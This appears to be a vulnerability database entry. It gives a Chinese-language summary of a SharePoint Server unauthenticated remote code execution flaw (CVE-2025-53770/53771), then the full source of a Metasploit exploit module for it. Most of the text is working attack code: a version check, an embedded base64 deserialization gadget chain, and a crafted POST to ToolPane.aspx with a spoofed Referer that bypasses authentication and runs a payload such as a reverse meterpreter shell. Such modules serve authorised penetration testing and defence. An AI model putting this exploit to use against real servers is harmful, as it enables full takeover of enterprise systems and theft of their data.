Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution

漏洞信息

漏洞名称： Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution

漏洞编号：

• CVE： 2025-53770, 2025-53771

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： 该漏洞影响Microsoft SharePoint Server，一个广泛使用的企业级协作平台，支持文档管理、内容管理和团队协作等功能。由于其广泛部署在企业环境中，该漏洞的影响范围较大。漏洞涉及两个CVE编号：CVE-2025-53770和CVE-2025-53771，分别是不安全的反序列化漏洞和认证绕过漏洞的补丁绕过。技术根源在于SharePoint Server在处理ToolPane.aspx页面时，未能正确验证和过滤用户输入，导致攻击者可以构造恶意请求绕过认证并执行反序列化攻击。这种漏洞允许攻击者在未授权的情况下远程执行任意代码，可能导致服务器被完全控制、数据泄露或服务中断。由于漏洞可以被远程利用且无需用户交互，其风险等级被评估为严重。

产品厂商： Microsoft

产品名称： Microsoft SharePoint Server

影响版本： 16.0.14326.20450 <= version <= 16.0.18526.20424, 16.0.10337.12109 <= version <= 16.0.10417.20027, 16.0.4351.1000 <= version <= 16.0.5508.1000, 15.0.4481.1005 <= version <= 15.0.5545.1000, 14.0.7015.1000 <= version <= 14.0.7268.5000

来源： https://github.com/rapid7/metasploit-framework/blob/d2a1f7bae9277e5817e5bcf71f75e586137149db/modules%2Fexploits%2Fwindows%2Fhttp%2Fsharepoint_toolpane_rce.rb

类型： rapid7/metasploit-framework:github issues

POC详情

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)',
        'Description' => %q{
          This module exploits the authentication bypass vulnerability CVE-2025-53771 (a patch bypass of CVE-2025-49706),
          and an unsafe deserialization vulnerability CVE-2025-53770 (a patch bypass of CVE-2025-49704), to achieve
          unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          # Discovered CVE-2025-49704 and CVE-2025-49706, demoed at Pwn2Own Berlin 2025.
          'Viettel Cyber Security',
          # Metasploit module, based on the public PoC of the zero-day exploit for CVE-2025-53770 and CVE-2025-53771.
          'sfewer-r7'
          # NOTE: The author attribution for CVE-2025-53770 and CVE-2025-53771 is unclear.
        ],
        'References' => [
          # Microsoft SharePoint DataSetSurrogateSelector Deserialization of Untrusted Data Remote Code Execution Vulnerability.
          ['CVE', '2025-49704'],
          # Microsoft SharePoint ToolPane Authentication Bypass Vulnerability.
          ['CVE', '2025-49706'],
          # Patch bypass for CVE-2025-49704, exploited in-the-wild as a zero-day.
          ['CVE', '2025-53770'],
          # Patch bypass for CVE-2025-49706, exploited in-the-wild as a zero-day.
          ['CVE', '2025-53771'],
          # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],
          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771, caught in-the-wild.
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771'],
          # Microsoft Guidance.
          ['URL', 'https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/'],
          # The zero-day exploit for CVE-2025-53770 and CVE-2025-53771, published July 21, 2025.
          ['URL', 'https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501'],
          # Markus Wulftange (CODE WHITE GmbH) reproduced CVE-2025-49704 and CVE-2025-49706, circa July 14, 2025.
          ['URL', 'https://x.com/codewhitesec/status/1944743478350557232'],
          # Dinh Ho Anh Khoa (Viettel Cyber Security) demoed CVE-2025-49704 and CVE-2025-49706 at Pwn2Own Berlin on May 16, 2025.
          ['URL', 'https://x.com/thezdi/status/1923317597673533552'],
          # Prior work from Steven Seeley on a similar DataSet gadget chain for SharePoint.
          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
        ],
        'DisclosureDate' => '2025-07-19', # Disclosure date for CVE-2025-53770 and CVE-2025-53771.
        'Platform' => ['win'],
        'Arch' => [ARCH_CMD],
        'Privileged' => false, # Executes as the SharePoint site user.
        'Targets' => [
          [
            'Default', {}
          ]
        ],
        # NOTE: Tested with the following payloads:
        #   cmd/windows/http/x64/meterpreter/reverse_tcp
        #   cmd/windows/generic
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false,
          # Delete the fetch binary after execution.
          'FETCH_DELETE' => true,
          # The root path of the SharePoint site
          'URIPATH' => '/'
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'error.aspx')
    )

    return CheckCode::Unknown('Connection failed') unless res

    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200

    # The returned HTML will have a blob of JavaScript that contains a hash object called _spPageContextInfo. A key
    # called siteClientTag will have a value of the current SharePoint Server patch level. We cannot rely on the HTTP
    # header value MicrosoftSharePointTeamServices as this may not reflect the actual patch level.
    site_client_tag = res.body.match(/"siteClientTag"\s*:\s*"\d*[$]+([^"]+)",/)

    return CheckCode::Unknown('Unable to extract the siteClientTag') unless site_client_tag

    version = Rex::Version.new(site_client_tag[1])

    # We compare the version we pull from the target, against a table of known vulnerable SharePoint editions. We
    # compare the target version against the RTM version (i.e. the first version of an edition) and the version *before*
    # the patch for CVE-2025-53770 and CVE-2025-53771 (which supersedes patches for CVE-2025-49704 and CVE-2025-49706
    # from July 2025).
    # https://learn.microsoft.com/en-us/sharepoint/product-servicing-policy/updated-product-servicing-policy-for-sharepoint-2019
    # https://learn.microsoft.com/en-us/officeupdates/sharepoint-updates

    ranges = [
      [
        'Microsoft SharePoint Server Subscription Edition',
        '16.0.14326.20450', # The RTM version (circa 2021)
        '16.0.18526.20424' # July 2025
      ],
      [
        'Microsoft SharePoint Server 2019',
        '16.0.10337.12109', # The RTM version (circa 2019)
        '16.0.10417.20027' # July 2025
      ],
      [
        'Microsoft SharePoint Enterprise Server 2016',
        '16.0.4351.1000', # The RTM version (circa 2017)
        '16.0.5508.1000' # July 2025
      ],
      # NOTE: It is unclear if older unsupported versions (SharePoint Server 2013 and 2010) are vulnerable.
      [
        'SharePoint Server 2013',
        '15.0.4481.1005',
        '15.0.5545.1000' # Last version before end of support.
      ],
      [
        'SharePoint Server 2010',
        '14.0.7015.1000',
        '14.0.7268.5000' # Last version before end of support.
      ]
    ]

    ranges.each do |product, rtm_version, patch_version|
      if version.between?(Rex::Version.new(rtm_version), Rex::Version.new(patch_version))
        return Exploit::CheckCode::Appears("Detected #{product} version #{version}")
      end
    end

    # If we get here, it's a patched version.
    Exploit::CheckCode::Safe("Detected Microsoft SharePoint Server version #{version}")
  end

  def exploit
    gadget_raw = create_gadget_chain
    send_exploit(gadget_raw)
  end

  def create_gadget_chain
    # NOTE: Depending on the version of SharePoint, different gadgets can be used.
    #
    # * A TypeConfuseDelegate + BinaryFormatter gadget chain was tested against Microsoft SharePoint Server 2019 version
    # 16.0.10337.12109 (RTM circa 2019), but does not work on more recent versions like 16.0.10417.20018 (June 2025).
    #
    # * The XmlSchema DataSet chain which then wraps the TypeConfuseDelegate + LosFormatter gadget chain was tested to
    # work against Microsoft SharePoint Server 2019 versions 16.0.10337.12109 (RTM circa 2019), 16.0.10417.20018
    # (June 2025), and 16.0.10417.20027 (July 2025). This is the chain as caught in-the-wild circa July 19, 2025.

    typeconfusedelegate_gadget_raw = ::Msf::Util::DotNetDeserialization.generate(
      payload.encoded,
      gadget_chain: :TypeConfuseDelegate,
      formatter: :LosFormatter
    )

    vprint_status('Using TypeConfuseDelegate + LosFormatter gadget chain:')
    vprint_line(Rex::Text.to_hex_dump(typeconfusedelegate_gadget_raw))

    typeconfusedelegate_gadget_b64 = Base64.strict_encode64(typeconfusedelegate_gadget_raw)

    # This gadget chain was pulled from the PoC posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501)
    # and is thought to be from the zero-day exploit caught in-the-wild. The payload from the in-the-wild gadget has
    # been removed and replaced with a string value "HAX".
    #
    # TO-DO: get rid of this base64 blob, and construct the gadget using the Msf::Util::DotNetDeserializatio helper routines.
    dataset_gadget_b64 = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'

    dataset_gadget_raw = Base64.strict_decode64(dataset_gadget_b64)

    # We have replaced the original payload from the in-the-wild exploit, with a string value "HAX". We use that "HAX"
    # value to swap in our TypeConfuseDelegate gadget chain, and then fix up the string lengths.
    dataset_gadget_raw.gsub!(
      'HAX',
      typeconfusedelegate_gadget_b64
    ).gsub!(
      Msf::Util::DotNetDeserialization.encode_7bit_int(9163),
      Msf::Util::DotNetDeserialization.encode_7bit_int(9163 - 7772 + typeconfusedelegate_gadget_b64.length)
    )

    vprint_status('Using XmlSchema DataSet + BinaryFormatter gadget chain:')
    vprint_line(Rex::Text.to_hex_dump(dataset_gadget_raw))

    dataset_gadget_raw
  end

  def send_exploit(gadget_raw)
    gadget_gzip = StringIO.new

    gzip = Zlib::GzipWriter.new(gadget_gzip)
    gzip.write(gadget_raw)
    gzip.close

    namespace_ui = Rex::Text.rand_text_alpha_lower(8..16)
    namespace_scorecards = Rex::Text.rand_text_alpha_lower(8..16)

    xml = <<~EOF
      <%@ Register Tagprefix="#{namespace_ui}" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
      <%@ Register Tagprefix="#{namespace_scorecards}" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
        <#{namespace_ui}:UpdateProgress>
          <ProgressTemplate>
            <#{namespace_scorecards}:ExcelDataSet CompressedDataTable="#{Base64.strict_encode64(gadget_gzip.string)}" DataTable-CaseSensitive="true" runat="server"/>
          </ProgressTemplate>
        </#{namespace_ui}:UpdateProgress>
    EOF

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
      'ctype' => 'application/x-www-form-urlencoded',
      'headers' => {
        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
      },
      'vars_get' => {
        'DisplayMode' => 'Edit',
        'a' => '/ToolPane.aspx'
      },
      'vars_post' => {
        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
        'MSOTlPn_DWP' => xml
      }
    )
  end
end